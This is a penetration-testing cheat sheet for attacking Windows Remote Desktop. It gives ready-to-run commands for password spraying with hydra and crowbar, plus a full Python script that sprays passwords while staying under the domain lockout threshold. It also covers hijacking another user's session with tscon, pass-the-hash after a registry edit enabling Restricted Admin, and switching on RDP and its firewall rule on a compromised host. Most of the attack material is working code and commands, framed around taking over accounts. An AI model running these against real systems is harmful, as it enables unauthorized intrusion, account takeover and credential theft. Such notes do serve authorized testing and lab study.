
RDP

ABOUT

Remote Desktop Protocol (RDP) is Microsoft's protocol for remote graphical access to a Windows host: screen output, keyboard and mouse input are carried, encrypted, over IP. It sits at the application layer of the TCP/IP model and normally listens on TCP/3389 (newer versions also use UDP/3389 as an optional transport). If Network Address Translation (NAT) sits between client and server, as is usual across the Internet, the client has to reach the server's public IP address (or a forwarded port). The security layer is negotiated when the connection opens: Standard RDP Security (the legacy RC4 scheme, downgradable and MITM-able), TLS, or CredSSP, i.e. Network Level Authentication (NLA), which authenticates the user before a session is created. Which of these a server still accepts is what nmap's rdp-enum-encryption script and rdp-sec-check report.

CONNECTING

Rdesktop

rdesktop -u venator17 -p 'amogus' -d domain.kek 13.13.13.13

Xfreerdp

Regular

xfreerdp /u:venator17 /p:amogus /v:13.13.13.13 /d:domain.kek /cert:ignore

With Port-Forwarding

xfreerdp /u:venator17 /p:amogus /v:localhost:3389 /d:domain.kek /cert:ignore

Mounting a local dir (shows up inside the session as \\tsclient\share, handy for moving tools in and loot out)

xfreerdp /v:13.13.13.13 /u:venator17 /p:amogus /drive:share,/home/venator17/Assessment123

Remmina (GUI)

remmina

PASSWORD SPRAYING

Check the domain lockout policy first (net accounts /domain, or the Password Policies page): one password across all users per round, then wait out the observation window before the next password, otherwise the spray locks the accounts you were hoping to take over.

Crowbar

crowbar -b rdp -s 13.13.13.13/32 -U users.txt -c 'amogus'

Hydra

hydra -L users.txt -p 'amogus' 13.13.13.13 rdp
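Hydra and crowbar push guesses as fast as the target answers; against a domain with a lockout policy you want to stay under the threshold. Below is an added example written for this page (not code from the cheat sheet, hydra or crowbar) of a spray loop that tries at most threshold-1 passwords per user per observation window and sleeps the window out between rounds. It assumes you already read the threshold and window from the domain policy; the default checker shells out to xfreerdp with +auth-only and treats exit code 0 as "credentials accepted", which is an assumption to confirm against your FreeRDP build, and any attempt(host, domain, user, password) callable can replace it. The user and password lists at the bottom are made up.

```python
#!/usr/bin/env python3
"""Lockout-aware RDP password spray.

Added example for this page; not code from the original cheat sheet, hydra or crowbar.
Assumes you already pulled the domain lockout threshold and observation window
(e.g. `net accounts /domain`). The default checker shells out to xfreerdp's +auth-only
mode and treats exit code 0 as "credentials accepted"; that mapping is an assumption
to confirm against your FreeRDP build. Any attempt(host, domain, user, password)
callable can replace it.
"""
import subprocess
import time


def xfreerdp_attempt(host, domain, user, password, timeout=20):
    """Authenticate without opening a desktop; True when xfreerdp exits 0 (assumed = valid creds)."""
    cmd = ["xfreerdp", f"/v:{host}", f"/d:{domain}", f"/u:{user}", f"/p:{password}",
           "/cert:ignore", "+auth-only"]
    try:
        return subprocess.run(cmd, capture_output=True, timeout=timeout).returncode == 0
    except (subprocess.TimeoutExpired, FileNotFoundError):
        return False


def plan_rounds(passwords, lockout_threshold):
    """Split passwords into rounds of at most threshold-1 guesses per user.

    The spare attempt is headroom for the real user mistyping their password;
    a threshold of 0 means accounts never lock, so everything goes in one round.
    """
    passwords = list(passwords)
    if lockout_threshold <= 0:
        return [passwords]
    per_round = max(1, lockout_threshold - 1)
    return [passwords[i:i + per_round] for i in range(0, len(passwords), per_round)]


def spray(host, domain, users, passwords, lockout_threshold, window_minutes,
          attempt=xfreerdp_attempt, sleep=time.sleep, delay=1.0):
    """Return {user: password} for every hit.

    Between rounds we sleep the whole observation window so badPwdCount has
    reset before the next batch; `sleep` is injectable so the schedule can be
    exercised without waiting.
    """
    hits = {}
    rounds = plan_rounds(passwords, lockout_threshold)
    for i, batch in enumerate(rounds):
        for user in users:
            if user in hits:          # stop guessing accounts we already own
                continue
            for pw in batch:
                if attempt(host, domain, user, pw):
                    hits[user] = pw
                    break
                sleep(delay)          # small gap between guesses, easier on logs and the DC
        if i < len(rounds) - 1:
            sleep(window_minutes * 60)
    return hits


if __name__ == "__main__":
    # Constructed example values; 13.13.13.13 / domain.kek are the page's placeholders
    users = ["venator17", "svc_backup"]
    passwords = ["amogus", "Summer2024!", "Winter2024!"]
    found = spray("13.13.13.13", "domain.kek", users, passwords,
                  lockout_threshold=5, window_minutes=30)
    for u, p in found.items():
        print(f"[+] {u}:{p}")
```

With a threshold of 5 the three passwords above fit in a single round of four guesses per user, so no window sleep is needed; with a threshold of 2 the same list becomes three rounds separated by a 30-minute pause each.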

SESSION HIJACKING

Requires SYSTEM (an Administrator shell is not enough). Find the ID of the victim's disconnected session (query user / qwinsta list IDs and session names), then attach it to your own session with tscon.exe:

tscon 13 /dest:V17

Here 13 is the target session ID and V17 the name of the session you are sitting in; the victim's desktop is handed over without a password prompt.

PASS-THE-HASH

RDP accepts an NT hash only when the server runs in Restricted Admin mode, which is off by default. If you already have admin on the box through another channel (SMB, WinRM) and want a GUI session, enable it by setting DisableRestrictedAdmin to 0 (the name is inverted: 0 means Restricted Admin is on):

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Then pass the hash with xfreerdp:

xfreerdp /v:13.13.13.13 /u:venator17 /pth:12379NSKDFKSJDF20931C031

A Restricted Admin logon does not place the user's credentials on the target, so network access from inside that session runs as the machine account rather than as the user.

ENABLE FROM SYSTEM

As example one time I needed to access internal host, so it would be good if I turned on rdp and made a port forwarding, So here's the steps do do it

  1. Change fDenyTSConnections Registry key which denies RDP connections

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# OR same thing but with PowerShell, to convenience

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -Value 0
  1. Changing a Firewall to allow us to move through RDP

netsh advfirewall firewall set rule group='remote desktop' new enable=yes

Tips2Hack

  1. Nmap RDP scan plus rdp-sec-check, which reports the security layers and encryption levels the server still negotiates

nmap -sV -sC 13.13.13.13 -p3389 --script rdp*
./rdp-sec-check.pl 13.13.13.13

  2. Session hijacking needs SYSTEM privileges and tscon.exe, which attaches another user's desktop session to yours.

RDP Security Check

[LINK]
[LINK]